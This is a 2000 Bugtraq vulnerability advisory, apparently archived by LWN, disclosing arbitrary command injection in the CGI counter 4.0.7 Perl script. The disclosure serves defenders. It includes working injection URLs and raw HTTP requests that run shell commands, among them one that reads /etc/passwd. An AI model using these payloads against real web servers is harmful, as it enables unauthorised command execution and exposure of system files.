![[LWN Logo]](/images/lwn.banner.gif)
Date: Mon, 15 May 2000 10:24:47 EDT
From: "Howard M. Kash III" <hmkash@ARL.MIL>
Subject: Vulnerability in CGI counter 4.0.7 by George Burgyan
To: BUGTRAQ@SECURITYFOCUS.COM
I've found no mention of this vulnerability in Bugtraq or in the
CVE nor have I been able to contact the author, so I'm posting
here to give everyone the opportunity to protect themselves.
This vulnerability is being actively exploited and has been
reported to CERT.
The popular CGI web page access counter version 4.0.7 by George
Burgyan allows execution of arbitrary commands due to unchecked
user input. Commands are executed with the same privilege as
the web server. Of course, other exploits can be used to get
root access on an unpatched OS.
The counter consists of a perl script called "counter", and
multiple links to counter called counter-ord, counterfiglet,
counterfiglet-ord, counterbanner, and counterbanner-ord. The
following examples illustrate how they can be exploited:
Using straight URL
------------------
http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
Passing commands in a variable
------------------------------
> telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd
> telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
The counter was last updated in 1995 so is probably no longer
supported. Links and email addresses referenced in the source
code are no longer valid. However, it appears to still be widely
used based on the number of references returned by search engine
queries.
Howard Kash